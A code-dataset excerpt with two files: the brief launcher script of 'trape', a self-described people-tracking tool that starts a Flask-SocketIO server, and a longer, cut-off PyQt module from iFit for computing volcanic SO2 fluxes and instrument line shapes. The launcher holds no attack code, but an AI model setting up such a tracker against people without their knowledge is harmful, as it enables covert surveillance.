"CC-BY-3.0",
"MIT"
] | 1
|
2021-11-28T00:03:42.000Z
|
2021-11-28T00:03:42.000Z
|
trape.py
|
xmi666/trape
|
4f56fbb3f88bcf8d9ceff1f2e32b300bd58b43c4
|
[
"CC-BY-3.0",
"MIT"
] | 3
|
2021-05-19T13:18:52.000Z
|
2021-06-12T18:15:34.000Z
|
trape.py
|
xmi666/trape
|
4f56fbb3f88bcf8d9ceff1f2e32b300bd58b43c4
|
[
"CC-BY-3.0",
"MIT"
] | 1
|
2022-02-03T23:37:03.000Z
|
2022-02-03T23:37:03.000Z
|
#!/usr/bin/env python3.8
# -*- coding: utf-8 -*-
# **
#
##########################################
# Trape | People tracker on the Internet #
##########################################
#
# Learn to track the world, to avoid being traced
#
# @version 2.1
# @link https://github.com/jofpin/trape
# @author Jose Pino (@jofpin)
# @copyright 2018 by Jose Pino / <jofpin@gmail.com>
#
# This file is the boot in Trape.
# For full copyright information this visit: https://github.com/jofpin/trape
#
# **
#
###############################################
from flask_socketio import SocketIO
from core.utils import utils #
from core import trape, db, app
try:
import flask
import flask_socketio
import os
except:
utils.Go("\t\nPlease install requirements.txt libraries, you can do it executing:")
utils.Go("\t\npip install -r requirements.txt")
if __name__ == "__main__":
trape.load_config()
trape.process_arguments()
if db.firstTime:
db.create_database()
utils.first_time_message()
trape.header()
import core.user
import core.stats
from core.sockets import Sockets
socketio = SocketIO(app)
socketio.on_namespace(Sockets('/trape'))
try:
socketio.run(app, host='0.0.0.0', port=trape.app_port, debug=False)
except KeyboardInterrupt:
socketio.stop()
exit(0)
| 24.553571
| 87
| 0.599273
|
acff5ecbd1742b53ac097a19fb8c347c800d35e7
| 74,435
|
py
|
Python
|
ifit/gui_tools.py
|
benjaminesse/iFit
|
f9450c0740c68038c5bd1682d700428185cafb4a
|
[
"MIT"
] | 3
|
2019-06-28T00:48:20.000Z
|
2021-02-22T07:30:29.000Z
|
ifit/gui_tools.py
|
benjaminesse/iFit
|
f9450c0740c68038c5bd1682d700428185cafb4a
|
[
"MIT"
] | null | null | null |
ifit/gui_tools.py
|
benjaminesse/iFit
|
f9450c0740c68038c5bd1682d700428185cafb4a
|
[
"MIT"
] | null | null | null |
"""Contains scripts to launch GUI tools.
These functions laucnch new windows for tasks outside the standard GUI,
including:
- Calculate light dilution
- Characterise the flat spectrum and instrument line shape
- Measure fluxes from traverse measurements
"""
import os
import sys
import yaml
import logging
import traceback
import numpy as np
import pandas as pd
import pyqtgraph as pg
from functools import partial
from scipy.optimize import curve_fit
from scipy.interpolate import griddata
from PyQt5.QtGui import QIcon, QPalette, QColor
from PyQt5.QtCore import Qt, QThreadPool, QObject, pyqtSignal, QThread
from PyQt5.QtWidgets import (QMainWindow, QWidget, QApplication, QGridLayout,
QLabel, QTextEdit, QLineEdit, QPushButton, QFrame,
QFileDialog, QScrollArea, QCheckBox, QSplitter,
QComboBox, QDoubleSpinBox, QTableWidget,
QTableWidgetItem, QTabWidget, QMessageBox)
from ifit.gui_functions import QTextEditLogger, DSpinBox, Widgets
from ifit.parameters import Parameters
from ifit.spectral_analysis import Analyser
from ifit.load_spectra import average_spectra
from ifit.light_dilution import generate_ld_curves
try:
from .make_ils import super_gaussian
from .haversine import haversine
except ImportError:
from make_ils import super_gaussian
from haversine import haversine
COLORS = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b',
'#e377c2', '#7f7f7f', '#bcbd22', '#17becf']
logger = logging.getLogger(__name__)
# =============================================================================
# Calculate Flux
# =============================================================================
class CalcFlux(QMainWindow):
"""Open a window for flux analysis."""
def __init__(self, parent=None):
"""Initialise the window."""
super(CalcFlux, self).__init__(parent)
# Set the window properties
self.setWindowTitle('Calculate Flux')
self.statusBar().showMessage('Ready')
self.setGeometry(40, 40, 1000, 500)
self.setWindowIcon(QIcon('bin/icons/flux.png'))
# Set the window layout
self.generalLayout = QGridLayout()
self._centralWidget = QScrollArea()
self.widget = QWidget()
self.setCentralWidget(self._centralWidget)
self.widget.setLayout(self.generalLayout)
# Scroll Area Properties
self._centralWidget.setWidgetResizable(True)
self._centralWidget.setWidget(self.widget)
self.save_flag = False
self.widgets = Widgets()
self._createApp()
self.load_config()
def _createApp(self):
"""Create the app widgets."""
# Create a frame to hold program controls
self.controlFrame = QFrame(self)
self.controlFrame.setFrameShape(QFrame.StyledPanel)
# Create a frame to hold volcano data
self.volcanoFrame = QFrame(self)
self.volcanoFrame.setFrameShape(QFrame.StyledPanel)
# Create a frame to hold program outputs
self.outputFrame = QFrame(self)
self.outputFrame.setFrameShape(QFrame.StyledPanel)
# Create a frame to hold graphs
self.graphFrame = QFrame(self)
self.graphFrame.setFrameShape(QFrame.StyledPanel)
# Add splitters to allow for adjustment
splitter1 = QSplitter(Qt.Vertical)
splitter1.addWidget(self.controlFrame)
splitter1.addWidget(self.volcanoFrame)
splitter1.addWidget(self.outputFrame)
splitter2 = QSplitter(Qt.Horizontal)
splitter2.addWidget(splitter1)
splitter2.addWidget(self.graphFrame)
# Pack the Frames and splitters
self.generalLayout.addWidget(splitter2)
self._createControls()
self._createVolcano()
self._createOutput()
self._createGraphs()
# =============================================================================
# Program Controls
# =============================================================================
def _createControls(self):
"""Build the main GUI controls."""
# Generate main layout
layout = QGridLayout(self.controlFrame)
# Create input for iFit output
layout.addWidget(QLabel('iFit File:'), 0, 0)
self.widgets['so2_path'] = QLineEdit()
self.widgets['so2_path'].setFixedSize(200, 25)
layout.addWidget(self.widgets['so2_path'], 0, 1)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.widgets['so2_path'],
'single', "Comma Separated (*.csv)"))
layout.addWidget(btn, 0, 2)
# Add checkbox to remove bad fits
self.widgets['despike_flag'] = QCheckBox('Remove\nBad fits?')
layout.addWidget(self.widgets['despike_flag'], 0, 3)
# Create input for GPS intput
layout.addWidget(QLabel('GPS File:'), 1, 0)
self.widgets['gps_path'] = QLineEdit()
self.widgets['gps_path'].setFixedSize(200, 25)
layout.addWidget(self.widgets['gps_path'], 1, 1)
gps_btn = QPushButton('Browse')
gps_btn.setFixedSize(70, 25)
gps_btn.clicked.connect(partial(browse, self, self.widgets['gps_path'],
'single', "GPS File (*.txt)"))
layout.addWidget(gps_btn, 1, 2)
# Add checkbox to remove bad fits
def gps_toggle():
state = self.widgets['gps_file_flag'].isChecked()
self.widgets['gps_path'].setReadOnly(state)
gps_btn.setEnabled(state)
self.widgets['gps_file_flag'] = QCheckBox('Use Separate\nGPS File?')
self.widgets['gps_file_flag'].stateChanged.connect(gps_toggle)
layout.addWidget(self.widgets['gps_file_flag'], 1, 3)
gps_toggle()
# Create inputs for the time difference
layout.addWidget(QLabel('GPS Time\nDifference:'), 2, 0)
self.widgets['tdiff'] = QDoubleSpinBox()
self.widgets['tdiff'].setRange(-24, 24)
self.widgets['tdiff'].setValue(0.0)
layout.addWidget(self.widgets['tdiff'], 2, 1)
# Make a button to read in the data
btn = QPushButton('Import')
btn.setFixedSize(100, 25)
btn.clicked.connect(self.import_data)
layout.addWidget(btn, 3, 3)
# Create input for output
layout.addWidget(QLabel('Output\nFolder:'), 3, 0)
self.widgets['out_path'] = QLineEdit()
self.widgets['out_path'].setFixedSize(200, 25)
layout.addWidget(self.widgets['out_path'], 3, 1)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.widgets['out_path'],
'folder'))
layout.addWidget(btn, 3, 2)
# =============================================================================
# Volcano Data
# =============================================================================
def _createVolcano(self):
"""Create the volcano data inputs."""
# Load volcano data
self.volcano_data = {}
if os.path.isfile('bin/volcano_data.yml'):
with open('bin/volcano_data.yml', 'r') as ymlfile:
self.volcano_data = yaml.load(ymlfile, Loader=yaml.FullLoader)
# Create the layout
layout = QGridLayout(self.volcanoFrame)
# Create a combobox to hold the pre-saved volcano data
layout.addWidget(QLabel('Volcano:'), 0, 0)
self.widgets['volcano'] = QComboBox()
self.widgets['volcano'].addItems(
['--select--'] + list(self.volcano_data.keys()))
self.widgets['volcano'].currentIndexChanged.connect(
self.update_volcano_data)
layout.addWidget(self.widgets['volcano'], 0, 1)
# Create inputs for the volcano latitude
layout.addWidget(QLabel('Volcano\nLatitude:'), 1, 0)
self.vlat = QLineEdit()
self.vlat.textChanged.connect(self._on_volcano_change)
layout.addWidget(self.vlat, 1, 1)
# Create inputs for the volcano longitude
layout.addWidget(QLabel('Volcano\nLongitutde:'), 2, 0)
self.vlon = QLineEdit()
self.vlon.textChanged.connect(self._on_volcano_change)
layout.addWidget(self.vlon, 2, 1)
# Create inputs for the wind speed
layout.addWidget(QLabel('Wind\nSpeed:'), 1, 2)
self.widgets['wind_speed'] = QDoubleSpinBox()
self.widgets['wind_speed'].setRange(0, 100)
self.widgets['wind_speed'].setValue(1.0)
layout.addWidget(self.widgets['wind_speed'], 1, 3)
# Create input for wind units
self.widgets['wind_units'] = QComboBox()
self.widgets['wind_units'].addItems(['m/s', 'knots'])
layout.addWidget(self.widgets['wind_units'], 1, 4)
# Create inputs for the wind speed
layout.addWidget(QLabel('Wind\nError:'), 2, 2)
self.widgets['wind_error'] = QDoubleSpinBox()
self.widgets['wind_error'].setRange(0, 1000)
layout.addWidget(self.widgets['wind_error'], 2, 3)
# Create input for wind units
self.widgets['err_units'] = QComboBox()
self.widgets['err_units'].addItems(['%', 'abs'])
layout.addWidget(self.widgets['err_units'], 2, 4)
# =============================================================================
# Create outputs
# =============================================================================
def _createOutput(self):
"""Create the program outputs."""
# Generate the layout
layout = QGridLayout(self.outputFrame)
# Add a button to calculate the flux
calc_btn = QPushButton('Calculate Flux')
calc_btn.setFixedSize(90, 25)
calc_btn.clicked.connect(self.calc_flux)
layout.addWidget(calc_btn, 0, 0)
# Add a button to remove the last flux
rem_btn = QPushButton('Remove Last')
rem_btn.setFixedSize(90, 25)
rem_btn.clicked.connect(self.del_trav)
layout.addWidget(rem_btn, 0, 1)
# Add a button to save the fluxes
sav_btn = QPushButton('Save Fluxes')
sav_btn.setFixedSize(90, 25)
sav_btn.clicked.connect(self.save_fluxes)
layout.addWidget(sav_btn, 0, 2)
# Create a combobox to hold the pre-saved volcano data
label = QLabel('Flux\nUnits:')
label.setAlignment(Qt.AlignRight)
layout.addWidget(label, 0, 3)
self.widgets['flux_units'] = QComboBox()
self.widgets['flux_units'].addItems(['kg/s', 't/day'])
layout.addWidget(self.widgets['flux_units'], 0, 4)
# Add a table to hold the flux results
self.fluxTable = QTableWidget()
self.fluxTable.setColumnCount(2)
self.fluxTable.setRowCount(0)
self.fluxTable.setHorizontalHeaderLabels(['Flux', 'Error'])
layout.addWidget(self.fluxTable, 1, 0, 1, 5)
# Create a textbox to display the program messages
self.logBox = QTextEditLogger(self)
self.logBox.setFormatter(logging.Formatter('%(message)s'))
logging.getLogger().addHandler(self.logBox)
logging.getLogger().setLevel(logging.INFO)
layout.addWidget(self.logBox.widget, 2, 0, 1, 5)
# =============================================================================
# Graphs
# =============================================================================
def _createGraphs(self):
"""Generate the graphs."""
layout = QGridLayout(self.graphFrame)
pg.setConfigOptions(antialias=True)
# Generate tabs for the graphs and settings
tab1 = QWidget()
tab2 = QWidget()
# Form the tab widget
tabwidget = QTabWidget()
tabwidget.addTab(tab1, 'Traverse')
tabwidget.addTab(tab2, 'Map')
layout.addWidget(tabwidget, 0, 0)
g1layout = QGridLayout(tab1)
graphwin = pg.GraphicsLayoutWidget(show=True)
# Make the graphs
self.ax = graphwin.addPlot()
self.ax.setDownsampling(mode='peak')
self.ax.setClipToView(True)
self.ax.showGrid(x=True, y=True)
# Add axis labels
self.ax.setLabel('left', 'SO<sub>2</sub> SCD (molec cm<sup>-2</sup>)')
self.ax.setLabel('bottom', 'Time')
# Add the plot elements
b0 = QColor('#1f77b4')
b0.setAlpha(120)
l1 = pg.PlotCurveItem(pen=None)
l2 = pg.PlotCurveItem(pen=None)
pfill = pg.FillBetweenItem(l1, l2, pen=None, brush=b0)
self.ax.addItem(pfill)
line = pg.PlotCurveItem(pen=pg.mkPen(COLORS[0], width=2))
sline = pg.PlotCurveItem(pen=pg.mkPen(COLORS[2], width=2))
# Add the region selector
region_select = pg.LinearRegionItem()
region_select.setZValue(-1)
region_select.sigRegionChangeFinished.connect(self._on_region_change)
# Add the baseline
baseline = pg.InfiniteLine(0, angle=0, movable=True)
self.ax_elements = {'line': line, 'sline': sline, 'hi_err': l1,
'lo_err': l2, 'region_select': region_select,
'baseline': baseline}
for el in self.ax_elements.values():
self.ax.addItem(el)
# Add the graphs to the layout
g1layout.addWidget(graphwin, 0, 0, 0, 5)
# Create a combobox to determine x axis as time or number
self.widgets['x_axis'] = QComboBox()
self.widgets['x_axis'].addItems(['Time', 'Number'])
self.widgets['x_axis'].currentIndexChanged.connect(self.switch_x_axis)
g1layout.addWidget(self.widgets['x_axis'], 1, 2)
g2layout = QGridLayout(tab2)
graphwin = pg.GraphicsLayoutWidget(show=True)
# Make the maps
self.mapax = graphwin.addPlot()
self.mapax.setDownsampling(mode='peak')
self.mapax.setClipToView(True)
self.mapax.showGrid(x=True, y=True)
self.mapax.setAspectLocked(True)
self.mapax.addLegend()
# Add plot elements
full_trav_line = pg.PlotCurveItem(pen=pg.mkPen(COLORS[0], width=2))
trav_scat = pg.ScatterPlotItem()
trav_scat.setZValue(-1)
trav_line = pg.PlotCurveItem(pen=pg.mkPen(COLORS[2], width=2))
volcano = pg.ScatterPlotItem(symbol='o', size=10, name='Volcano',
brush=pg.mkBrush(color='r'))
plume_start = pg.ScatterPlotItem(
symbol='t1', pen=pg.mkPen(color='w'), size=10,
brush=pg.mkBrush(color=COLORS[2]), name='Plume Start')
plume_stop = pg.ScatterPlotItem(
symbol='t', pen=pg.mkPen(color='w'), size=10,
brush=pg.mkBrush(color=COLORS[2]), name='Plume Centre')
plume_cent = pg.ScatterPlotItem(
symbol='o', pen=pg.mkPen(color='w'), size=10,
brush=pg.mkBrush(color=COLORS[2]), name='Plume End')
self.map_elements = {'full_trav_line': full_trav_line,
'trav_line': trav_line,
'trav_scat': trav_scat,
'plume_start': plume_start,
'plume_stop': plume_stop,
'plume_cent': plume_cent,
'volcano': volcano}
for el in self.map_elements.values():
self.mapax.addItem(el)
# Add axis labels
self.mapax.setLabel('left', 'Latitude')
self.mapax.setLabel('bottom', 'Longitude')
# Generate the colormap
self.cm = pg.colormap.get('magma', source='matplotlib')
# Make pens for plotting
self.p0 = pg.mkPen(color='#1f77b4', width=1.5)
self.p1 = pg.mkPen(color='#ff7f0e', width=2.0)
self.b0 = QColor('#1f77b4')
self.b0.setAlpha(120)
# Add the graphs to the layout
g2layout.addWidget(graphwin, 0, 0, 0, 0)
# =============================================================================
# Update Volcano Data
# =============================================================================
def update_volcano_data(self):
"""Update the volcano data on combobox change."""
volc = str(self.widgets.get('volcano'))
if volc != '--select--':
data = self.volcano_data[volc]
self.vlat.setText(str(data[0]))
self.vlon.setText(str(data[1]))
# =============================================================================
# Slot functions
# =============================================================================
def _on_region_change(self):
try:
# Find the bounds of the selected area
i0, i1 = self.ax_elements['region_select'].getRegion()
if self.widgets.get('x_axis') == 'Time':
idx = np.where(np.logical_and(self.so2_time >= i0,
self.so2_time <= i1))
else:
idx = np.where(np.logical_and(self.so2_num >= i0,
self.so2_num <= i1))
# Extract the relevant gps data and interpolate onto the so2 grid
so2_time = self.so2_time[idx]
so2_num = self.so2_num[idx]
lat = self.lat[idx]
lon = self.lon[idx]
# Update the graph
ploty = self.so2_scd[idx] / 10**self.order
if self.widgets.get('x_axis') == 'Time':
plotx = so2_time
else:
plotx = so2_num
self.ax_elements['sline'].setData(plotx, ploty)
# Update the map
self.map_elements['trav_line'].setData(lon, lat)
self.map_elements['plume_start'].setData([lon[0]], [lat[0]])
self.map_elements['plume_stop'].setData([lon[-1]], [lat[-1]])
except AttributeError:
pass
def _on_volcano_change(self):
try:
vlat = float(self.vlat.text())
vlon = float(self.vlon.text())
self.map_elements['volcano'].setData([vlon], [vlat])
except ValueError:
pass
# =============================================================================
# Import data
# =============================================================================
def import_data(self):
"""Import the traverse data."""
logger.info('Importing traverse data...')
# Ask to save any outstanding fluxes
if self.save_flag:
options = QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel
reply = QMessageBox.question(self, 'Message',
"Would you like to save the fluxes?",
options, QMessageBox.Cancel)
if reply == QMessageBox.Yes:
self.save_fluxes()
elif reply == QMessageBox.No:
pass
else:
return
# Read in the SO2 results
logger.info('Importing gas data...')
so2_df = pd.read_csv(self.widgets.get('so2_path'),
parse_dates=['Time'], comment='#')
self.so2_time = np.array([t.hour + t.minute/60 + t.second/3600
for t in so2_df['Time']])
self.so2_num = so2_df['Number'].to_numpy()
self.so2_scd = so2_df['SO2'].to_numpy()
self.so2_err = so2_df['SO2_err'].to_numpy()
if self.widgets['despike_flag'].isChecked():
try:
mask = so2_df['fit_quality'] != 1
self.so2_scd = np.ma.masked_where(mask, self.so2_scd)
self.so2_err = np.ma.masked_where(mask, self.so2_err)
except KeyError:
logger.warning('Fit quality not found in iFit file!')
if self.widgets['gps_file_flag'].isChecked():
# Read in the GPS data
logger.info('Importing GPS data...')
gps_df = pd.read_table(self.widgets.get('gps_path'), sep='\t',
parse_dates=['time'])
lat = gps_df['latitude'].to_numpy()
lon = gps_df['longitude'].to_numpy()
# Correct the GPS time for the time difference
tdiff = float(self.widgets.get('tdiff'))
gps_time = np.array([t.hour + t.minute/60 + t.second/3600 + tdiff
for t in gps_df['time']])
# Interpolate the GPS locations onto the spectra times
self.lat = griddata(gps_time, lat, self.so2_time)
self.lon = griddata(gps_time, lon, self.so2_time)
else:
# Pull from the iFit results file
self.lat = so2_df['Lat'].to_numpy()
self.lon = so2_df['Lon'].to_numpy()
ploty = self.so2_scd
if np.nanmax(self.so2_scd) > 1e6:
self.order = int(np.ceil(np.log10(np.nanmax(ploty)))) - 1
ploty = ploty / 10**self.order
plot_err = [ploty - self.so2_err/10**self.order,
ploty + self.so2_err/10**self.order]
self.ax.setLabel('left', f'SO2 SCD (1e{self.order})')
if self.widgets.get('x_axis') == 'Time':
plotx = self.so2_time
else:
plotx = self.so2_num
# Update graph
self.ax_elements['line'].setData(plotx, ploty)
self.ax_elements['hi_err'].setData(plotx, plot_err[0])
self.ax_elements['lo_err'].setData(plotx, plot_err[1])
self.ax_elements['region_select'].setRegion([plotx[0], plotx[-1]])
self.ax_elements['baseline'].setValue(0)
# Update map
norm = (ploty-np.nanmin(ploty)) / np.nanmax(ploty-np.nanmin(ploty))
pens = [pg.mkPen(color=self.cm.map(val)) for val in norm]
brushes = [pg.mkBrush(color=self.cm.map(val))
for val in norm]
self.map_elements['trav_scat'].setData(
x=self.lon, y=self.lat, pen=pens, brush=brushes)
self.map_elements['full_trav_line'].setData(x=self.lon, y=self.lat)
# Create a traverse counter and dictionary to hold the results
self.flux_data = {}
self.trav_no = 0
# Reset the results table
self.fluxTable.setRowCount(0)
# Turn off the svae flag
self.save_flag = False
logger.info('Traverses imported!')
def switch_x_axis(self):
"""Switch traverse x axis."""
try:
ploty = self.so2_scd
if np.nanmax(self.so2_scd) > 1e6:
self.order = int(np.ceil(np.log10(np.nanmax(ploty)))) - 1
ploty = ploty / 10**self.order
plot_err = [ploty - self.so2_err/10**self.order,
ploty + self.so2_err/10**self.order]
self.ax.setLabel('left', f'Fit value (1e{self.order})')
if self.widgets.get('x_axis') == 'Time':
plotx = self.so2_time
else:
plotx = self.so2_num
# Update the graph
self.ax_elements['line'].setData(plotx, ploty)
self.ax_elements['hi_err'].setData(plotx, plot_err[0])
self.ax_elements['lo_err'].setData(plotx, plot_err[1])
self.ax_elements['region_select'].setRegion([plotx[0], plotx[-1]])
except AttributeError:
pass
# =============================================================================
# Calculate Flux
# =============================================================================
def calc_flux(self):
"""Calculate the flux from the selected traverse."""
logger.info('Calculating flux:')
# Pull the relavant data from the GUI
vlat = float(self.vlat.text())
vlon = float(self.vlon.text())
wind_speed = float(self.widgets.get('wind_speed'))
wind_error = float(self.widgets.get('wind_error'))
flux_units = self.widgets.get('flux_units')
wind_units = self.widgets.get('wind_units')
err_units = self.widgets.get('err_units')
# Change units if required
if err_units == 'abs':
wind_error = wind_error / wind_speed
else:
wind_error = wind_error / 100
# If wind speed is in knotts, convert to m/s
if wind_units == 'knots':
wind_speed = wind_speed * 0.5144444444
else:
wind_speed = wind_speed
logger.info(f'Wind speed: {wind_speed:.02f} m/s')
# Find the bounds of the selected area
i0, i1 = self.ax_elements['region_select'].getRegion()
if self.widgets.get('x_axis') == 'Time':
idx = np.where(np.logical_and(self.so2_time >= i0,
self.so2_time <= i1))
else:
idx = np.where(np.logical_and(self.so2_num >= i0,
self.so2_num <= i1))
# Extract the travese from the SO2 data
so2_time = self.so2_time[idx]
so2_scd = self.so2_scd[idx]
so2_err = self.so2_err[idx]
lat = self.lat[idx]
lon = self.lon[idx]
# Correct the baseline in SO2
baseline = self.ax_elements['baseline'].value()*(10**self.order)
so2_scd = np.subtract(so2_scd, baseline)
# Find the centre of mass of the plume
cum_so2_scd = np.nancumsum(so2_scd)
peak_idx = np.abs(cum_so2_scd - cum_so2_scd[-1]/2).argmin()
# Calculate the plume bearing
volc_loc = [vlat, vlon]
peak_loc = [lat[peak_idx], lon[peak_idx]]
plume_dist, plume_bearing = haversine(volc_loc, peak_loc)
logger.info(f'Distance from vent: {plume_dist:.02f} m')
logger.info(f'Azimuth from vent: {np.degrees(plume_bearing):.02f} deg')
# Calculate the distance and bearing of each measurement vector
vect = [haversine([lat[i-1], lon[i-1]], [lat[i], lon[i]])
for i in range(1, len(lat))]
# Unpack the distance and bearing from the vectors
trav_dist, trav_bearing = np.asarray(vect).T
# Correct the distance for the angle between the travel and plume
# vectors
corr_factor = np.sin(plume_bearing-trav_bearing)
corr_dist = np.multiply(trav_dist, corr_factor)
# Convert so2 amounts from molecules.cm-2 to molecules.m-2
so2_molec_per_m2 = so2_scd * 1.0e4
# Multiply by the distance moved and sum
so2_molec_per_m = np.nansum(np.multiply(so2_molec_per_m2[1:],
corr_dist))
# Multiply by the wind speed
so2_molec_per_s = so2_molec_per_m * wind_speed
# Convert to moles
so2_moles_per_s = so2_molec_per_s / 6.022e23
# Convert to kg/s. Molar mass of SO2 is 64.066 g/mole
so2_kg_per_s = so2_moles_per_s * 0.064066
logger.info(f'Total SO2 mass: {abs(so2_kg_per_s/wind_speed):.02f} kg')
# Convert to t/day if required
if flux_units == 't/day':
flux = abs(so2_kg_per_s * 60*60*24 / 1000.0)
else:
flux = abs(so2_kg_per_s)
logger.info(f'SO2 Flux: {flux:.02f} {flux_units}')
# Calculate the Flux Error
so2_err[abs(so2_err) == np.inf] = np.nan
tot_so2_err = np.nansum(so2_err)
frac_so2_err = tot_so2_err / np.nansum(so2_scd)
# Combine with the wind speed error
frac_err = ((frac_so2_err)**2 + (wind_error)**2)**0.5
flux_err = flux * frac_err
# Add the flux result to the table
self.fluxTable.setRowCount(self.fluxTable.rowCount()+1)
self.fluxTable.setItem(self.trav_no, 0,
QTableWidgetItem(f'{flux:.02f}'))
self.fluxTable.setItem(self.trav_no, 1,
QTableWidgetItem(f'{flux_err:.02f}'))
# Plot the traverse graphs
self.map_elements['trav_line'].setData(lon, lat)
self.map_elements['plume_start'].setData([lon[0]], [lat[0]])
self.map_elements['plume_cent'].setData([peak_loc[1]], [peak_loc[0]])
self.map_elements['plume_stop'].setData([lon[-1]], [lat[-1]])
self.map_elements['volcano'].setData([vlon], [vlat])
# Collate the results
output_data = np.column_stack([so2_time[1:], so2_scd[1:], so2_err[1:],
lat[1:], lon[1:], trav_dist,
trav_bearing, corr_factor])
self.flux_data[f'trav{self.trav_no}'] = {'flux': flux,
'flux_err': flux_err,
'flux_units': flux_units,
'wind_speed': wind_speed,
'vlat': vlat,
'vlon': vlon,
'peak_loc': peak_loc,
'output_data': output_data}
# Increment the counter
self.trav_no += 1
self.save_flag = True
def del_trav(self):
"""Delete the last traverse."""
if self.trav_no > 0:
logger.info('Removing last traverse')
self.trav_no -= 1
self.flux_data.pop(f'trav{self.trav_no}')
self.fluxTable.setRowCount(self.fluxTable.rowCount()-1)
if self.trav_no == 0:
self.save_flag = False
def save_fluxes(self):
"""Output the flux results."""
# Make sure the output directory exists, and create if not
out_path = self.widgets.get('out_path')
if not os.path.isdir(out_path):
os.makedirs(out_path)
for i, [key, data] in enumerate(self.flux_data.items()):
# Write the detailed output
with open(out_path + 'flux_results.csv', 'w') as w:
w.write(f'Traverse Number,{i+1}\n'
+ f'Flux ({data["flux_units"]}),{data["flux"]}\n'
+ f'Error ({data["flux_units"]}),{data["flux_err"]}\n'
+ f'Wind Speed (m/s), {data["wind_speed"]}\n'
+ f'Volcano Lat/Lon,{data["vlat"]},{data["vlon"]}\n'
+ f'Plume Center,{data["peak_loc"][0]},'
+ f'{data["peak_loc"][1]}\n'
+ 'Time (Decimal hours),SO2 SCD,SO2 Err,Lat,Lon,'
+ 'Distance,Bearing,Correction Factor\n')
for i, line in enumerate(data["output_data"]):
w.write(str(line[0]))
for j in line[1:]:
w.write(f',{j}')
w.write('\n')
w.write('\n')
# Write summary output
flux_units = data["flux_units"]
fluxes = [data['flux'] for data in self.flux_data.values()]
errors = [data['flux_err'] for data in self.flux_data.values()]
w_mean_flux = np.average(fluxes, weights=np.power(errors, -2))
w_mean_error = (1 / np.sum(np.power(errors, -2)))**0.5
with open(out_path + 'flux_summary.txt', 'w') as w:
w.write(f'Flux Summary\nFlux ({flux_units}), Error\n')
for i in range(len(fluxes)):
w.write(f'{fluxes[i]}, {errors[i]}\n')
w.write(f'Av Flux = {np.average(fluxes):.02f} {flux_units}\n')
w.write(f'Stdev = {np.std(fluxes):.02f} {flux_units}\n')
w.write(f'Weighted Mean Flux = {w_mean_flux:.02f}'
+ f' (+/- {w_mean_error:.02f}) {flux_units}')
logger.info('Fluxes saved')
self.save_flag = False
def closeEvent(self, event):
"""Handle GUI closure."""
if self.save_flag:
options = QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel
reply = QMessageBox.question(self, 'Message',
"Would you like to save the fluxes?",
options, QMessageBox.Cancel)
if reply == QMessageBox.Yes:
self.save_fluxes()
self.save_config()
event.accept()
elif reply == QMessageBox.No:
event.accept()
self.save_config()
else:
event.ignore()
else:
self.save_config()
def load_config(self):
"""Load previous session settings."""
# Open the config file
try:
with open('bin/.calc_flux_config.yml', 'r') as ymlfile:
config = yaml.load(ymlfile, Loader=yaml.FullLoader)
for key, item in config.items():
try:
self.widgets.set(key, item)
except Exception:
logger.warning(f'Failed to load {key} from config file')
except FileNotFoundError:
logger.warning('Unable to load config file!')
def save_config(self):
"""Save session settings."""
config = {}
for key in self.widgets:
config[key] = self.widgets.get(key)
# Write the config
with open('bin/.calc_flux_config.yml', 'w') as outfile:
yaml.dump(config, outfile)
# =============================================================================
# Measure ILS
# =============================================================================
class ILSWindow(QMainWindow):
"""Opens ILS analysis window."""
def __init__(self, parent=None):
"""Initialise the ILS window."""
super(ILSWindow, self).__init__(parent)
# Set the window properties
self.setWindowTitle('Measure ILS')
self.statusBar().showMessage('Ready')
self.setGeometry(40, 40, 1000, 600)
self.setWindowIcon(QIcon('bin/icons/ils.png'))
# Set the window layout
self.generalLayout = QGridLayout()
self._centralWidget = QScrollArea()
self.widget = QWidget()
self.setCentralWidget(self._centralWidget)
self.widget.setLayout(self.generalLayout)
# Scroll Area Properties
self._centralWidget.setWidgetResizable(True)
self._centralWidget.setWidget(self.widget)
self._createApp()
def _createApp(self):
layout = QGridLayout(self._centralWidget)
# Add option for spectra type
layout.addWidget(QLabel('Format:'), 0, 0)
self.spec_type = QComboBox()
self.spec_type.setToolTip('Choose spectrum format')
self.spec_type.addItems(['iFit',
'Master.Scope',
'Spectrasuite',
'mobileDOAS',
'Basic'])
self.spec_type.setFixedSize(100, 20)
layout.addWidget(self.spec_type, 0, 1)
# Add an input for the spectra selection
layout.addWidget(QLabel('Spectra:'), 1, 0)
self.spec_fnames = QTextEdit()
self.spec_fnames.setFixedSize(300, 150)
layout.addWidget(self.spec_fnames, 1, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.spec_fnames, 'multi'))
layout.addWidget(btn, 1, 4)
# Add an input for the dark spectra selection
layout.addWidget(QLabel('Dark\nSpectra:'), 2, 0)
self.dark_fnames = QTextEdit()
self.dark_fnames.setFixedSize(300, 150)
layout.addWidget(self.dark_fnames, 2, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.dark_fnames, 'multi'))
layout.addWidget(btn, 2, 4)
# Add an input for the save selection
layout.addWidget(QLabel('Save:'), 3, 0)
self.save_path = QLineEdit()
layout.addWidget(self.save_path, 3, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.save_path,
'save'))
layout.addWidget(btn, 3, 4)
btn = QPushButton('Import')
btn.setFixedSize(70, 25)
btn.clicked.connect(self.import_spectra)
layout.addWidget(btn, 4, 1)
btn = QPushButton('Fit')
btn.setFixedSize(70, 25)
btn.clicked.connect(self.measure_ils)
layout.addWidget(btn, 4, 2)
btn = QPushButton('Save')
btn.setFixedSize(70, 25)
btn.clicked.connect(self.save_fit)
layout.addWidget(btn, 4, 3)
graphwin = pg.GraphicsLayoutWidget(show=True)
pg.setConfigOptions(antialias=True)
# pg.setConfigOptions(useOpenGL=True)
w = QWidget()
glayout = QGridLayout(w)
# Make the graphs
self.ax0 = graphwin.addPlot(row=0, col=0)
self.ax1 = graphwin.addPlot(row=1, col=0)
self.plot_axes = [self.ax0, self.ax1]
for ax in self.plot_axes:
